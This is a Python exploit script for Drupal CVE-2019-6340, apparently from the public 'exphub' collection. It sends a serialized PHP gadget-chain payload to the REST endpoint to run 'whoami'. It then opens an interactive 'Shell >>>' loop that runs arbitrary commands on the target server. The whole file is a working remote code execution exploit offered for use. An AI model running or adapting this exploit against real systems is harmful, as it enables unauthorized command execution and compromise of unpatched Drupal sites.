#!/usr/bin/python3
# coding:utf-8
# author(cn):之乎者也
# author(en):zhzyker
# from:https://github.com/zhzyker/exphub
# telegram:t.me/zhzyker
# qq(群):219291257

import requests
import sys
import re

if len(sys.argv)!=2:
    print('+---------------------------------------------------------------+')
    print('+ DES: by zhzyker as https://github.com/zhzyker/exphub          +')
    print('+                    https://freeerror.org/d/488                +')
    print('+---------------------------------------------------------------+')
    print('+ USE: python3 <filename> <url>                                 +')
    print('+ EXP: python3 cve-2019-6340_cmd.py http://freeerror.org:8080   +')
    print('+ VER: Drupal < 8.6.10                                          +')
    print('+      Drupal < 8.5.12                                          +')
    print('+---------------------------------------------------------------+')
    sys.exit()

url = sys.argv[1]
cmd = "whoami"
dir = "/node/?_format=hal_json"
url_dir = url + dir
cmd_len = len(cmd)

payload = "{\r\n  \"link\": [\r\n    {\r\n      \"value\": \"link\",\r\n      \"options\": \"O:24:\\\"GuzzleHttp\\\\Psr7\\\\FnStream\\\":2:{s:33:\\\"\\u0000GuzzleHttp\\\\Psr7\\\\FnStream\\u0000methods\\\";a:1:{s:5:\\\"close\\\";a:2:{i:0;O:23:\\\"GuzzleHttp\\\\HandlerStack\\\":3:{s:32:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000handler\\\";s:%s:\\\"%s\\\";s:30:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000stack\\\";a:1:{i:0;a:1:{i:0;s:6:\\\"system\\\";}}s:31:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000cached\\\";b:0;}i:1;s:7:\\\"resolve\\\";}}s:9:\\\"_fn_close\\\";a:2:{i:0;r:4;i:1;s:7:\\\"resolve\\\";}}\"\r\n    }\r\n  ],\r\n  \"_links\": {\r\n    \"type\": {\r\n      \"href\": \"%s/rest/type/shortcut/default\"\r\n    }\r\n  }\r\n}" % (cmd_len,cmd,url)
headers = {
    'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
    'Connection': "close",
    'Content-Type': "application/hal+json",
    'Accept': "*/*",
    'Cache-Control': "no-cache"   
    }
response = requests.request("POST", url_dir, data=payload, headers=headers)
if response.status_code==403 and "u0027access" in response.text :
    print ("[+] Find Drupal CVE-2019-6340 Vuln!\n")
else:
    print ("[-] Not Drupal CVE-2019-6340 Vuln! Good Luck~\n")
    sys.exit()

def do_post(cmd):
    payload = "{\r\n  \"link\": [\r\n    {\r\n      \"value\": \"link\",\r\n      \"options\": \"O:24:\\\"GuzzleHttp\\\\Psr7\\\\FnStream\\\":2:{s:33:\\\"\\u0000GuzzleHttp\\\\Psr7\\\\FnStream\\u0000methods\\\";a:1:{s:5:\\\"close\\\";a:2:{i:0;O:23:\\\"GuzzleHttp\\\\HandlerStack\\\":3:{s:32:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000handler\\\";s:%s:\\\"%s\\\";s:30:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000stack\\\";a:1:{i:0;a:1:{i:0;s:6:\\\"system\\\";}}s:31:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000cached\\\";b:0;}i:1;s:7:\\\"resolve\\\";}}s:9:\\\"_fn_close\\\";a:2:{i:0;r:4;i:1;s:7:\\\"resolve\\\";}}\"\r\n    }\r\n  ],\r\n  \"_links\": {\r\n    \"type\": {\r\n      \"href\": \"%s/rest/type/shortcut/default\"\r\n    }\r\n  }\r\n}" % (cmd_len,cmd,url)
       
    headers = {
        'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
        'Connection': "close",
        'Content-Type': "application/hal+json",
        'Accept': "*/*",
        'Cache-Control': "no-cache"
        }
    global response
    response = requests.request("POST", url_dir, data=payload, headers=headers)
    r = response.text
    s = r.split("}")[1]
    print (s)

while 1:
    cmd = input("Shell >>> ")
    cmd_len = len(cmd)
    if cmd == "exit" : exit(0)
    do_post(cmd)
